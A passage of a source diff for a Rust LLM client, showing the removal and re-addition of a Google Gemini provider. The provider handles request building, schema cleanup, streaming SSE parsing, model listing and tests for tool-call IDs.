.header("Content-Type", "application/json") - .json(&body) - .send() - .await - .map_err(|e| ProviderError::ServerError { - provider: self.id.clone(), - status: None, - message: e.to_string(), - is_retryable: true, - })?; - - let status = resp.status().as_u16(); - if status >= 400 { - let resp_body = - resp.text() - .await - .unwrap_or_else(|_| "".to_string()); - return Err(self.parse_error_response(status, &resp_body)); - } - - // Wrap the byte stream in a line-based SSE parser. - let provider_id_for_stream = self.id.clone(); - let model_clone = model.clone(); - let byte_stream = resp.bytes_stream(); - - let stream = async_stream::stream! { - let mut byte_stream = byte_stream; - let text_block_index: usize = 0; - let mut tool_block_index: usize = 1000; - let mut open_tool_calls: std::collections::HashMap = - std::collections::HashMap::new(); - let mut emitted_message_start = false; - let message_id = format!("gemini-{}", uuid_v4_simple()); - let mut line_buf = String::new(); - let mut tool_name_counts: std::collections::HashMap = - std::collections::HashMap::new(); - - while let Some(chunk_result) = byte_stream.next().await { - let chunk: Bytes = match chunk_result { - Ok(c) => c, - Err(e) => { - yield Err(ProviderError::StreamError { - provider: provider_id_for_stream.clone(), - message: e.to_string(), - partial_response: None, - }); - return; - } - }; - - let chunk_str = match std::str::from_utf8(&chunk) { - Ok(s) => s, - Err(_) => { - warn!("Google SSE: non-UTF8 chunk, skipping"); - continue; - } - }; - - line_buf.push_str(chunk_str); - - // Process complete lines. - while let Some(newline_pos) = line_buf.find('\n') { - let line = line_buf[..newline_pos].trim_end_matches('\r').to_string(); - line_buf = line_buf[newline_pos + 1..].to_string(); - - if let Some(data) = line.strip_prefix("data: ") { - let data = data.trim(); - if data.is_empty() || data == "[DONE]" { - continue; - } - - // Parse the JSON payload and emit events. - let parsed: Value = match serde_json::from_str(data) { - Ok(v) => v, - Err(e) => { - warn!("Google SSE: JSON parse error: {}: {}", e, data); - continue; - } - }; - - // Check for stream-level error. - if let Some(err) = parsed.get("error") { - let msg = err - .get("message") - .and_then(|m| m.as_str()) - .unwrap_or("unknown error") - .to_string(); - yield Err(ProviderError::StreamError { - provider: provider_id_for_stream.clone(), - message: msg, - partial_response: None, - }); - return; - } - - // Emit MessageStart on first chunk. - if !emitted_message_start { - emitted_message_start = true; - let meta = parsed.get("usageMetadata"); - let usage = UsageInfo { - input_tokens: meta - .and_then(|m| m.get("promptTokenCount")) - .and_then(|v| v.as_u64()) - .unwrap_or(0), - output_tokens: meta - .and_then(|m| m.get("candidatesTokenCount")) - .and_then(|v| v.as_u64()) - .unwrap_or(0), - cache_creation_input_tokens: 0, - cache_read_input_tokens: 0, - }; - yield Ok(StreamEvent::MessageStart { - id: message_id.clone(), - model: model_clone.clone(), - usage, - }); - } - - let candidates = parsed - .get("candidates") - .and_then(|c| c.as_array()); - - let Some(candidates) = candidates else { continue }; - - for candidate in candidates { - let parts = candidate - .get("content") - .and_then(|c| c.get("parts")) - .and_then(|p| p.as_array()); - - if let Some(parts) = parts { - for (part_idx, part) in parts.iter().enumerate() { - if let Some(text) = part.get("text").and_then(|t| t.as_str()) { - yield Ok(StreamEvent::TextDelta { - index: text_block_index, - text: text.to_string(), - }); - } else if let Some(fc) = part.get("functionCall") { - let name = fc - .get("name") - .and_then(|n| n.as_str()) - .unwrap_or("") - .to_string(); - let args_str = fc - .get("args") - .map(|a| a.to_string()) - .unwrap_or_else(|| "{}".to_string()); - - let idx = if let Some((existing_idx, _, _)) = open_tool_calls.get(&part_idx) { - *existing_idx - } else { - let occurrence = tool_name_counts - .entry(name.clone()) - .and_modify(|count| *count += 1) - .or_insert(0); - let id = Self::tool_use_id_for_name(&name, *occurrence); - let idx = tool_block_index; - tool_block_index += 1; - open_tool_calls.insert(part_idx, (idx, id.clone(), name.clone())); - yield Ok(StreamEvent::ContentBlockStart { - index: idx, - content_block: ContentBlock::ToolUse { - id, - name: name.clone(), - input: json!({}), - }, - }); - idx - }; - - yield Ok(StreamEvent::InputJsonDelta { - index: idx, - partial_json: args_str, - }); - } - } - } - - // Handle finish reason. - let finish_reason = candidate - .get("finishReason") - .and_then(|r| r.as_str()) - .unwrap_or(""); - - if !finish_reason.is_empty() - && finish_reason != "FINISH_REASON_UNSPECIFIED" - { - // Close text block. - yield Ok(StreamEvent::ContentBlockStop { - index: text_block_index, - }); - - // Close tool call blocks. - let mut tool_indices: Vec = - open_tool_calls - .values() - .map(|(idx, _, _)| *idx) - .collect(); - tool_indices.sort_unstable(); - for idx in tool_indices { - yield Ok(StreamEvent::ContentBlockStop { index: idx }); - } - open_tool_calls.clear(); - - let stop_reason = match finish_reason { - "STOP" => Some(StopReason::EndTurn), - "MAX_TOKENS" => Some(StopReason::MaxTokens), - "SAFETY" | "RECITATION" => Some(StopReason::ContentFiltered), - "TOOL_CODE" | "FUNCTION_CALL" => Some(StopReason::ToolUse), - other => Some(StopReason::Other(other.to_string())), - }; - - let meta = parsed.get("usageMetadata"); - let final_usage = UsageInfo { - input_tokens: meta - .and_then(|m| m.get("promptTokenCount")) - .and_then(|v| v.as_u64()) - .unwrap_or(0), - output_tokens: meta - .and_then(|m| m.get("candidatesTokenCount")) - .and_then(|v| v.as_u64()) - .unwrap_or(0), - cache_creation_input_tokens: 0, - cache_read_input_tokens: 0, - }; - - yield Ok(StreamEvent::MessageDelta { - stop_reason, - usage: Some(final_usage), - }); - yield Ok(StreamEvent::MessageStop); - } - } - } - // SSE comment lines (": ...") and blank lines are ignored. - } - } - }; - - Ok(Box::pin(stream)) - } - - async fn list_models(&self) -> Result, ProviderError> { - let url = format!( - "{}/v1beta/models?key={}", - self.base_url, self.api_key - ); - - let resp = self - .http_client - .get(&url) - .header("x-goog-api-key", &self.api_key) - .send() - .await - .map_err(|e| ProviderError::ServerError { - provider: self.id.clone(), - status: None, - message: e.to_string(), - is_retryable: true, - })?; - - let status = resp.status().as_u16(); - let body_text = resp.text().await.map_err(|e| ProviderError::ServerError { - provider: self.id.clone(), - status: Some(status), - message: e.to_string(), - is_retryable: true, - })?; - - if status >= 400 { - return Err(self.parse_error_response(status, &body_text)); - } - - let body: Value = - serde_json::from_str(&body_text).map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("Failed to parse models list JSON: {}", e), - status: Some(status), - body: Some(body_text.clone()), - })?; - - let models_array = body - .get("models") - .and_then(|m| m.as_array()) - .cloned() - .unwrap_or_default(); - - let provider_id = self.id.clone(); - let models: Vec = models_array - .iter() - .filter_map(|m| { - let name = m.get("name").and_then(|n| n.as_str())?; - // Only include Gemini models (filter out palm, embedding, etc.) - if !name.starts_with("models/gemini-") { - return None; - } - // Strip the "models/" prefix for the model ID. - let model_id = name.strip_prefix("models/").unwrap_or(name); - let display = m - .get("displayName") - .and_then(|d| d.as_str()) - .unwrap_or(model_id) - .to_string(); - let input_limit = m - .get("inputTokenLimit") - .and_then(|v| v.as_u64()) - .unwrap_or(32_768) as u32; - let output_limit = m - .get("outputTokenLimit") - .and_then(|v| v.as_u64()) - .unwrap_or(8_192) as u32; - - Some(ModelInfo { - id: ModelId::new(model_id), - provider_id: provider_id.clone(), - name: display, - context_window: input_limit, - max_output_tokens: output_limit, - }) - }) - .collect(); - - Ok(models) - } - - async fn health_check(&self) -> Result { - // Use list_models as a lightweight liveness check. - match self.list_models().await { - Ok(models) if !models.is_empty() => Ok(ProviderStatus::Healthy), - Ok(_) => Ok(ProviderStatus::Degraded { - reason: "No Gemini models returned".to_string(), - }), - Err(ProviderError::AuthFailed { message, .. }) => { - Err(ProviderError::AuthFailed { - provider: self.id.clone(), - message, - }) - } - Err(e) => Ok(ProviderStatus::Unavailable { - reason: e.to_string(), - }), - } - } - - fn capabilities(&self) -> ProviderCapabilities { - ProviderCapabilities { - streaming: true, - tool_calling: true, - thinking: true, - image_input: true, - pdf_input: true, - audio_input: false, - video_input: true, - caching: false, - structured_output: true, - system_prompt_style: SystemPromptStyle::SystemInstruction, - } - } -} - -// --------------------------------------------------------------------------- -// Helpers -// --------------------------------------------------------------------------- - -/// Generate a simple pseudo-random hex ID without pulling in the uuid crate. -/// Uses a combination of the current time and a thread-local counter. -fn uuid_v4_simple() -> String { - use std::time::{SystemTime, UNIX_EPOCH}; - let t = SystemTime::now() - .duration_since(UNIX_EPOCH) - .map(|d| d.as_nanos()) - .unwrap_or(0); - // Simple hash mix to spread bits. - let a = t ^ (t >> 17) ^ (t << 13); - let b = a.wrapping_mul(0x517cc1b727220a95); - format!("{:032x}", b) -} - -#[cfg(test)] -mod tests { - use super::*; - use claurst_core::types::Message; - use serde_json::json; - - fn test_request(messages: Vec) -> ProviderRequest { - ProviderRequest { - model: "gemini-3-flash-preview".to_string(), - messages, - system_prompt: None, - tools: vec![], - max_tokens: 512, - temperature: None, - top_p: None, - top_k: None, - stop_sequences: vec![], - thinking: None, - provider_options: json!({}), - } - } - - #[test] - fn build_request_body_uses_function_names_for_tool_results() { - let provider = GoogleProvider::new("test".to_string()); - let request = test_request(vec![ - Message::assistant_blocks(vec![ContentBlock::ToolUse { - id: "call_search_2".to_string(), - name: "search".to_string(), - input: json!({"q": "cats"}), - }]), - Message::user_blocks(vec![ContentBlock::ToolResult { - tool_use_id: "call_search_2".to_string(), - content: ToolResultContent::Text("ok".to_string()), - is_error: Some(false), - }]), - ]); - - let body = provider.build_request_body(&request); - let contents = body["contents"].as_array().expect("contents array"); - assert_eq!(contents.len(), 2); - assert_eq!( - contents[1]["parts"][0]["functionResponse"]["name"], - json!("search") - ); - } - - #[test] - fn build_request_body_preserves_tool_result_order() { - let provider = GoogleProvider::new("test".to_string()); - let request = test_request(vec![Message::user_blocks(vec![ - ContentBlock::Text { - text: "before".to_string(), - }, - ContentBlock::ToolResult { - tool_use_id: "call_search".to_string(), - content: ToolResultContent::Text("done".to_string()), - is_error: Some(false), - }, - ContentBlock::Text { - text: "after".to_string(), - }, - ])]); - - let body = provider.build_request_body(&request); - let contents = body["contents"].as_array().expect("contents array"); - assert_eq!(contents.len(), 3); - assert_eq!(contents[0]["role"], json!("user")); - assert_eq!(contents[0]["parts"][0]["text"], json!("before")); - assert_eq!(contents[1]["parts"][0]["functionResponse"]["name"], json!("search")); - assert_eq!(contents[2]["parts"][0]["text"], json!("after")); - } - - #[test] - fn parse_response_body_assigns_unique_ids_for_duplicate_tool_names() { - let provider = GoogleProvider::new("test".to_string()); - let response = json!({ - "candidates": [{ - "finishReason": "FUNCTION_CALL", - "content": { - "parts": [ - { "functionCall": { "name": "search", "args": { "q": "a" } } }, - { "functionCall": { "name": "search", "args": { "q": "b" } } } - ] - } - }], - "usageMetadata": {} - }); - - let parsed = provider - .parse_response_body(&response, "gemini-3-flash-preview") - .expect("parsed response"); - - assert!(matches!( - &parsed.content[0], - ContentBlock::ToolUse { id, .. } if id == "call_search" - )); - assert!(matches!( - &parsed.content[1], - ContentBlock::ToolUse { id, .. } if id == "call_search_2" - )); - } -} +// providers/google.rs — GoogleProvider: implements LlmProvider for the +// Google Gemini API (generativelanguage.googleapis.com). +// +// Supports: +// - Non-streaming: POST .../generateContent?key={api_key} +// - Streaming SSE: POST .../streamGenerateContent?alt=sse&key={api_key} +// - Tool/function calling via functionDeclarations +// - System prompts via systemInstruction field +// - Thinking config for Gemini 2.5+ and 3.0+ models +// - Image/video inputs via inlineData parts +// - list_models via GET /v1beta/models + +use std::pin::Pin; + +use async_trait::async_trait; +use bytes::Bytes; +use claurst_core::provider_id::{ModelId, ProviderId}; +use claurst_core::types::{ + ContentBlock, Message, MessageContent, Role, ToolResultContent, UsageInfo, +}; +use futures::{Stream, StreamExt}; +use serde_json::{json, Value}; +use tracing::{debug, warn}; + +use crate::error_handling::parse_error_response as parse_http_error; +use crate::provider::{LlmProvider, ModelInfo}; +use crate::provider_error::ProviderError; +use crate::provider_types::{ + ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus, StopReason, + StreamEvent, SystemPrompt, SystemPromptStyle, +}; + +use super::request_options::merge_google_options; + +// --------------------------------------------------------------------------- +// GoogleProvider +// --------------------------------------------------------------------------- + +pub struct GoogleProvider { + id: ProviderId, + api_key: String, + base_url: String, + http_client: reqwest::Client, +} + +impl GoogleProvider { + pub fn new(api_key: String) -> Self { + Self { + id: ProviderId::new(ProviderId::GOOGLE), + api_key, + base_url: "https://generativelanguage.googleapis.com".to_string(), + http_client: reqwest::Client::new(), + } + } + + // ----------------------------------------------------------------------- + // Internal helpers + // ----------------------------------------------------------------------- + + /// Returns true if the model supports thinking config (Gemini 2.5+ / 3.0+). + fn supports_thinking(model: &str) -> bool { + model.contains("2.5") + || model.contains("3.0") + || model.contains("3.1") + || model.contains("gemini-3") + } + + /// Build the full generateContent URL for non-streaming. + fn generate_url(&self, model: &str) -> String { + format!( + "{}/v1beta/models/{}:generateContent?key={}", + self.base_url, model, self.api_key + ) + } + + /// Build the full streamGenerateContent URL for streaming. + fn stream_url(&self, model: &str) -> String { + format!( + "{}/v1beta/models/{}:streamGenerateContent?alt=sse&key={}", + self.base_url, model, self.api_key + ) + } + + fn tool_use_id_for_name(name: &str, occurrence: usize) -> String { + let sanitized: String = name + .chars() + .map(|ch| { + if ch.is_ascii_alphanumeric() || ch == '_' || ch == '-' { + ch + } else { + '_' + } + }) + .collect(); + let base = if sanitized.is_empty() { + "tool" + } else { + sanitized.as_str() + }; + if occurrence == 0 { + format!("call_{}", base) + } else { + format!("call_{}_{}", base, occurrence + 1) + } + } + + fn tool_name_by_id(messages: &[Message]) -> std::collections::HashMap { + let mut map = std::collections::HashMap::new(); + for message in messages { + let MessageContent::Blocks(blocks) = &message.content else { + continue; + }; + for block in blocks { + if let ContentBlock::ToolUse { id, name, .. } = block { + map.insert(id.clone(), name.clone()); + } + } + } + map + } + + fn infer_tool_name_from_id(tool_use_id: &str) -> Option { + let raw = tool_use_id.strip_prefix("call_")?; + let trimmed = if let Some((candidate, suffix)) = raw.rsplit_once('_') { + if !candidate.is_empty() && suffix.chars().all(|ch| ch.is_ascii_digit()) { + candidate + } else { + raw + } + } else { + raw + }; + + if trimmed.is_empty() { + None + } else { + Some(trimmed.to_string()) + } + } + + /// Convert a single ContentBlock to a Gemini "part" Value. + /// Returns None for blocks that should be dropped (e.g. Thinking). + fn content_block_to_part(block: &ContentBlock) -> Option { + match block { + ContentBlock::Text { text } => Some(json!({ "text": text })), + + ContentBlock::Image { source } => { + // Prefer base64 inline data; fall back to URL if available. + if let (Some(data), Some(mime)) = (&source.data, &source.media_type) { + Some(json!({ + "inlineData": { + "data": data, + "mimeType": mime + } + })) + } else { + source.url.as_ref().map(|url| { + json!({ + "fileData": { + "fileUri": url, + "mimeType": source.media_type.as_deref().unwrap_or("image/jpeg") + } + }) + }) + } + } + + ContentBlock::ToolUse { name, input, .. } => Some(json!({ + "functionCall": { + "name": name, + "args": input + } + })), + + // Thinking blocks are not supported by Gemini — drop silently. + ContentBlock::Thinking { .. } | ContentBlock::RedactedThinking { .. } => None, + + // Document blocks: treat as file data when URL is available, + // otherwise as inline base64. + ContentBlock::Document { source, .. } => { + if let (Some(data), Some(mime)) = (&source.data, &source.media_type) { + Some(json!({ + "inlineData": { + "data": data, + "mimeType": mime + } + })) + } else { + source.url.as_ref().map(|url| json!({ + "fileData": { + "fileUri": url, + "mimeType": source.media_type.as_deref().unwrap_or("application/pdf") + } + })) + } + } + + // Render UI-only / metadata blocks as text so context is not lost. + ContentBlock::UserLocalCommandOutput { command, output } => Some(json!({ + "text": format!("$ {}\n{}", command, output) + })), + ContentBlock::UserCommand { name, args } => Some(json!({ + "text": format!("/{} {}", name, args) + })), + ContentBlock::UserMemoryInput { key, value } => Some(json!({ + "text": format!("[memory] {}: {}", key, value) + })), + ContentBlock::SystemAPIError { message, .. } => Some(json!({ + "text": format!("[error] {}", message) + })), + ContentBlock::CollapsedReadSearch { + tool_name, paths, .. + } => Some(json!({ + "text": format!("[{}] {}", tool_name, paths.join(", ")) + })), + ContentBlock::TaskAssignment { + id, + subject, + description, + } => Some(json!({ + "text": format!("[task:{}] {}: {}", id, subject, description) + })), + + // ToolResult is handled specially in message conversion. + ContentBlock::ToolResult { .. } => None, + } + } + + /// Convert a ToolResult block to a "functionResponse" part Value. + fn tool_result_to_part(tool_name: &str, content: &ToolResultContent) -> Value { + let response_content = match content { + ToolResultContent::Text(t) => json!({ "content": t }), + ToolResultContent::Blocks(blocks) => { + // Concatenate all text blocks for the response payload. + let text: String = blocks + .iter() + .filter_map(|b| { + if let ContentBlock::Text { text } = b { + Some(text.as_str()) + } else { + None + } + }) + .collect::>() + .join("\n"); + json!({ "content": text }) + } + }; + json!({ + "functionResponse": { + "name": tool_name, + "response": response_content + } + }) + } + + /// Sanitize a JSON Schema object for Google's stricter requirements: + /// - Integer enums → string enums + /// - `required` must only list fields actually in `properties` + /// - Non-object types must not have `properties`/`required` + /// - Array `items` must have a `type` field + fn sanitize_schema(schema: Value) -> Value { + match schema { + Value::Object(mut map) => { + // Strip keywords that Gemini's function-declaration schema does + // not understand and will reject with a 400 error. + map.remove("additionalProperties"); + map.remove("$schema"); + map.remove("default"); + map.remove("examples"); + map.remove("title"); + + // Recurse into nested schemas first. + let schema_type = map + .get("type") + .and_then(|v| v.as_str()) + .map(|s| s.to_string()); + + // Convert integer enums to string enums. + if let Some(Value::Array(enum_vals)) = map.get("enum") { + if enum_vals.iter().any(|v| v.is_number()) { + let string_enums: Vec = enum_vals + .iter() + .map(|v| Value::String(v.to_string())) + .collect(); + map.insert("enum".to_string(), Value::Array(string_enums)); + // Upgrade type to string when converting number enums. + map.insert("type".to_string(), Value::String("string".to_string())); + } + } + + // For object types: sanitize properties recursively and fix required. + if schema_type.as_deref() == Some("object") { + if let Some(Value::Object(props)) = map.get_mut("properties") { + let sanitized_props: serde_json::Map = props + .iter() + .map(|(k, v)| (k.clone(), Self::sanitize_schema(v.clone()))) + .collect(); + *props = sanitized_props; + } + + // Filter required to only include keys present in properties. + if let Some(Value::Array(req_arr)) = map.get("required").cloned() { + let prop_keys: std::collections::HashSet = map + .get("properties") + .and_then(|p| p.as_object()) + .map(|o| o.keys().cloned().collect()) + .unwrap_or_default(); + + let filtered: Vec = req_arr + .into_iter() + .filter(|v| v.as_str().map(|s| prop_keys.contains(s)).unwrap_or(false)) + .collect(); + map.insert("required".to_string(), Value::Array(filtered)); + } + } else { + // Non-object types must not carry properties/required. + map.remove("properties"); + map.remove("required"); + } + + // Array items: ensure a type field is present. + if schema_type.as_deref() == Some("array") { + if let Some(items) = map.get_mut("items") { + if let Value::Object(ref mut items_map) = items { + if !items_map.contains_key("type") { + items_map.insert( + "type".to_string(), + Value::String("string".to_string()), + ); + } + // Recurse sanitize into items. + let sanitized = Self::sanitize_schema(Value::Object(items_map.clone())); + *items = sanitized; + } + } + } + + Value::Object(map) + } + other => other, + } + } + + /// Build the full request body JSON for the Gemini API. + fn build_request_body(&self, request: &ProviderRequest) -> Value { + // ---- Convert messages ---- + // Google requires a flat list of content objects. + // ToolResult blocks must become separate user-role messages. + let mut contents: Vec = Vec::new(); + let tool_name_by_id = Self::tool_name_by_id(&request.messages); + + for msg in &request.messages { + let role = match msg.role { + Role::User => "user", + Role::Assistant => "model", + }; + + let blocks = msg.content_blocks(); + + let mut regular_parts: Vec = Vec::new(); + let mut tool_result_parts: Vec = Vec::new(); + let flush_regular_parts = |contents: &mut Vec, parts: &mut Vec| { + if !parts.is_empty() { + contents.push(json!({ + "role": role, + "parts": std::mem::take(parts) + })); + } + }; + let flush_tool_result_parts = |contents: &mut Vec, parts: &mut Vec| { + if !parts.is_empty() { + contents.push(json!({ + "role": "user", + "parts": std::mem::take(parts) + })); + } + }; + + for block in &blocks { + if let ContentBlock::ToolResult { + tool_use_id, + content, + .. + } = block + { + flush_regular_parts(&mut contents, &mut regular_parts); + let tool_name = tool_name_by_id + .get(tool_use_id) + .cloned() + .or_else(|| Self::infer_tool_name_from_id(tool_use_id)) + .unwrap_or_else(|| tool_use_id.clone()); + tool_result_parts.push(Self::tool_result_to_part(&tool_name, content)); + } else if let Some(part) = Self::content_block_to_part(block) { + flush_tool_result_parts(&mut contents, &mut tool_result_parts); + regular_parts.push(part); + } + } + + flush_regular_parts(&mut contents, &mut regular_parts); + flush_tool_result_parts(&mut contents, &mut tool_result_parts); + } + + // ---- System instruction ---- + let system_instruction: Option = request.system_prompt.as_ref().map(|sp| { + let text = match sp { + SystemPrompt::Text(t) => t.clone(), + SystemPrompt::Blocks(blocks) => blocks + .iter() + .map(|b| b.text.as_str()) + .collect::>() + .join("\n"), + }; + json!({ "parts": [{ "text": text }] }) + }); + + // ---- Tool declarations ---- + let tools_value: Option = if request.tools.is_empty() { + None + } else { + let declarations: Vec = request + .tools + .iter() + .map(|td| { + json!({ + "name": td.name, + "description": td.description, + "parameters": Self::sanitize_schema(td.input_schema.clone()) + }) + }) + .collect(); + Some(json!([{ "functionDeclarations": declarations }])) + }; + + // ---- Generation config ---- + let mut gen_config = serde_json::Map::new(); + gen_config.insert("maxOutputTokens".to_string(), json!(request.max_tokens)); + if let Some(temp) = request.temperature { + gen_config.insert("temperature".to_string(), json!(temp)); + } + if !request.stop_sequences.is_empty() { + gen_config.insert("stopSequences".to_string(), json!(request.stop_sequences)); + } + if let Some(top_p) = request.top_p { + gen_config.insert("topP".to_string(), json!(top_p)); + } + if let Some(top_k) = request.top_k { + gen_config.insert("topK".to_string(), json!(top_k)); + } + + // Thinking config for supported models. + if Self::supports_thinking(&request.model) && request.thinking.is_some() { + let budget = request + .thinking + .as_ref() + .map(|t| t.budget_tokens) + .unwrap_or(8192); + gen_config.insert( + "thinkingConfig".to_string(), + json!({ + "includeThoughts": true, + "thinkingBudget": budget + }), + ); + } + + // ---- Assemble body ---- + let mut body = serde_json::Map::new(); + body.insert("contents".to_string(), Value::Array(contents)); + body.insert("generationConfig".to_string(), Value::Object(gen_config)); + if let Some(si) = system_instruction { + body.insert("systemInstruction".to_string(), si); + } + if let Some(tools) = tools_value { + body.insert("tools".to_string(), tools); + } + + let mut value = Value::Object(body); + merge_google_options(&mut value, &request.provider_options); + value + } + + /// Parse a Google error JSON body and return the appropriate ProviderError. + fn parse_error_response(&self, status: u16, body: &str) -> ProviderError { + parse_http_error(status, body, &self.id) + } + + /// Extract content blocks and usage from a completed Gemini response body. + fn parse_response_body( + &self, + body: &Value, + model: &str, + ) -> Result { + let candidates = body + .get("candidates") + .and_then(|c| c.as_array()) + .ok_or_else(|| ProviderError::Other { + provider: self.id.clone(), + message: "Missing 'candidates' in response".to_string(), + status: None, + body: Some(body.to_string()), + })?; + + let candidate = candidates.first().ok_or_else(|| ProviderError::Other { + provider: self.id.clone(), + message: "Empty 'candidates' array in response".to_string(), + status: None, + body: Some(body.to_string()), + })?; + + let finish_reason = candidate + .get("finishReason") + .and_then(|r| r.as_str()) + .unwrap_or("STOP"); + + let stop_reason = match finish_reason { + "STOP" => StopReason::EndTurn, + "MAX_TOKENS" => StopReason::MaxTokens, + "SAFETY" => StopReason::ContentFiltered, + "RECITATION" => StopReason::ContentFiltered, + "TOOL_CODE" | "FUNCTION_CALL" => StopReason::ToolUse, + other => StopReason::Other(other.to_string()), + }; + + let parts = candidate + .get("content") + .and_then(|c| c.get("parts")) + .and_then(|p| p.as_array()); + + let mut content_blocks: Vec = Vec::new(); + let mut tool_name_counts: std::collections::HashMap = + std::collections::HashMap::new(); + + if let Some(parts) = parts { + for part in parts { + if let Some(text) = part.get("text").and_then(|t| t.as_str()) { + content_blocks.push(ContentBlock::Text { + text: text.to_string(), + }); + } else if let Some(fc) = part.get("functionCall") { + let name = fc + .get("name") + .and_then(|n| n.as_str()) + .unwrap_or("") + .to_string(); + let args = fc.get("args").cloned().unwrap_or(json!({})); + let occurrence = tool_name_counts + .entry(name.clone()) + .and_modify(|count| *count += 1) + .or_insert(0); + let id = Self::tool_use_id_for_name(&name, *occurrence); + content_blocks.push(ContentBlock::ToolUse { + id, + name, + input: args, + }); + } + } + } + + // Extract usage metadata. + let usage = self.extract_usage(body); + + Ok(ProviderResponse { + id: format!("gemini-{}", uuid_v4_simple()), + content: content_blocks, + stop_reason, + usage, + model: model.to_string(), + }) + } + + /// Extract UsageInfo from a response body's usageMetadata field. + fn extract_usage(&self, body: &Value) -> UsageInfo { + let meta = body.get("usageMetadata"); + UsageInfo { + input_tokens: meta + .and_then(|m| m.get("promptTokenCount")) + .and_then(|v| v.as_u64()) + .unwrap_or(0), + output_tokens: meta + .and_then(|m| m.get("candidatesTokenCount")) + .and_then(|v| v.as_u64()) + .unwrap_or(0), + cache_creation_input_tokens: 0, + cache_read_input_tokens: 0, + } + } +} + +// --------------------------------------------------------------------------- +// LlmProvider impl +// --------------------------------------------------------------------------- + +#[async_trait] +impl LlmProvider for GoogleProvider { + fn id(&self) -> &ProviderId { + &self.id + } + + fn name(&self) -> &str { + "Google" + } + + async fn create_message( + &self, + request: ProviderRequest, + ) -> Result { + let url = self.generate_url(&request.model); + let model = request.model.clone(); + let body = self.build_request_body(&request); + + debug!("Google create_message: POST {}", url); + + let resp = self + .http_client + .post(&url) + .header("x-goog-api-key", &self.api_key) + .header("Content-Type", "application/json") + .json(&body) + .send() + .await + .map_err(|e| ProviderError::ServerError { + provider: self.id.clone(), + status: None, + message: e.to_string(), + is_retryable: true, + })?; + + let status = resp.status().as_u16(); + let resp_body = resp.text().await.map_err(|e| ProviderError::ServerError { + provider: self.id.clone(), + status: Some(status), + message: e.to_string(), + is_retryable: true, + })?; + + if status >= 400 { + return Err(self.parse_error_response(status, &resp_body)); + } + + let json_body: Value = + serde_json::from_str(&resp_body).map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("Failed to parse response JSON: {}", e), + status: Some(status), + body: Some(resp_body.clone()), + })?; + + self.parse_response_body(&json_body, &model) + } + + async fn create_message_stream( + &self, + request: ProviderRequest, + ) -> Result> + Send>>, ProviderError> + { + let url = self.stream_url(&request.model); + let model = request.model.clone(); + let body = self.build_request_body(&request); + + debug!("Google create_message_stream: POST {}", url); + + let resp = self + .http_client + .post(&url) + .header("x-goog-api-key", &self.api_key) + .header("Content-Type", "application/json") + .json(&body) + .send() + .await + .map_err(|e| ProviderError::ServerError { + provider: self.id.clone(), + status: None, + message: e.to_string(), + is_retryable: true, + })?; + + let status = resp.status().as_u16(); + if status >= 400 { + let resp_body = resp + .text() + .await + .unwrap_or_else(|_| "".to_string()); + return Err(self.parse_error_response(status, &resp_body)); + } + + // Wrap the byte stream in a line-based SSE parser. + let provider_id_for_stream = self.id.clone(); + let model_clone = model.clone(); + let byte_stream = resp.bytes_stream(); + + let stream = async_stream::stream! { + let mut byte_stream = byte_stream; + let text_block_index: usize = 0; + let mut tool_block_index: usize = 1000; + let mut open_tool_calls: std::collections::HashMap = + std::collections::HashMap::new(); + let mut emitted_message_start = false; + let message_id = format!("gemini-{}", uuid_v4_simple()); + let mut line_buf = String::new(); + let mut tool_name_counts: std::collections::HashMap = + std::collections::HashMap::new(); + + while let Some(chunk_result) = byte_stream.next().await { + let chunk: Bytes = match chunk_result { + Ok(c) => c, + Err(e) => { + yield Err(ProviderError::StreamError { + provider: provider_id_for_stream.clone(), + message: e.to_string(), + partial_response: None, + }); + return; + } + }; + + let chunk_str = match std::str::from_utf8(&chunk) { + Ok(s) => s, + Err(_) => { + warn!("Google SSE: non-UTF8 chunk, skipping"); + continue; + } + }; + + line_buf.push_str(chunk_str); + + // Process complete lines. + while let Some(newline_pos) = line_buf.find('\n') { + let line = line_buf[..newline_pos].trim_end_matches('\r').to_string(); + line_buf = line_buf[newline_pos + 1..].to_string(); + + if let Some(data) = line.strip_prefix("data: ") { + let data = data.trim(); + if data.is_empty() || data == "[DONE]" { + continue; + } + + // Parse the JSON payload and emit events. + let parsed: Value = match serde_json::from_str(data) { + Ok(v) => v, + Err(e) => { + warn!("Google SSE: JSON parse error: {}: {}", e, data); + continue; + } + }; + + // Check for stream-level error. + if let Some(err) = parsed.get("error") { + let msg = err + .get("message") + .and_then(|m| m.as_str()) + .unwrap_or("unknown error") + .to_string(); + yield Err(ProviderError::StreamError { + provider: provider_id_for_stream.clone(), + message: msg, + partial_response: None, + }); + return; + } + + // Emit MessageStart on first chunk. + if !emitted_message_start { + emitted_message_start = true; + let meta = parsed.get("usageMetadata"); + let usage = UsageInfo { + input_tokens: meta + .and_then(|m| m.get("promptTokenCount")) + .and_then(|v| v.as_u64()) + .unwrap_or(0), + output_tokens: meta + .and_then(|m| m.get("candidatesTokenCount")) + .and_then(|v| v.as_u64()) + .unwrap_or(0), + cache_creation_input_tokens: 0, + cache_read_input_tokens: 0, + }; + yield Ok(StreamEvent::MessageStart { + id: message_id.clone(), + model: model_clone.clone(), + usage, + }); + } + + let candidates = parsed + .get("candidates") + .and_then(|c| c.as_array()); + + let Some(candidates) = candidates else { continue }; + + for candidate in candidates { + let parts = candidate + .get("content") + .and_then(|c| c.get("parts")) + .and_then(|p| p.as_array()); + + if let Some(parts) = parts { + for (part_idx, part) in parts.iter().enumerate() { + if let Some(text) = part.get("text").and_then(|t| t.as_str()) { + yield Ok(StreamEvent::TextDelta { + index: text_block_index, + text: text.to_string(), + }); + } else if let Some(fc) = part.get("functionCall") { + let name = fc + .get("name") + .and_then(|n| n.as_str()) + .unwrap_or("") + .to_string(); + let args_str = fc + .get("args") + .map(|a| a.to_string()) + .unwrap_or_else(|| "{}".to_string()); + + let idx = if let Some((existing_idx, _, _)) = open_tool_calls.get(&part_idx) { + *existing_idx + } else { + let occurrence = tool_name_counts + .entry(name.clone()) + .and_modify(|count| *count += 1) + .or_insert(0); + let id = Self::tool_use_id_for_name(&name, *occurrence); + let idx = tool_block_index; + tool_block_index += 1; + open_tool_calls.insert(part_idx, (idx, id.clone(), name.clone())); + yield Ok(StreamEvent::ContentBlockStart { + index: idx, + content_block: ContentBlock::ToolUse { + id, + name: name.clone(), + input: json!({}), + }, + }); + idx + }; + + 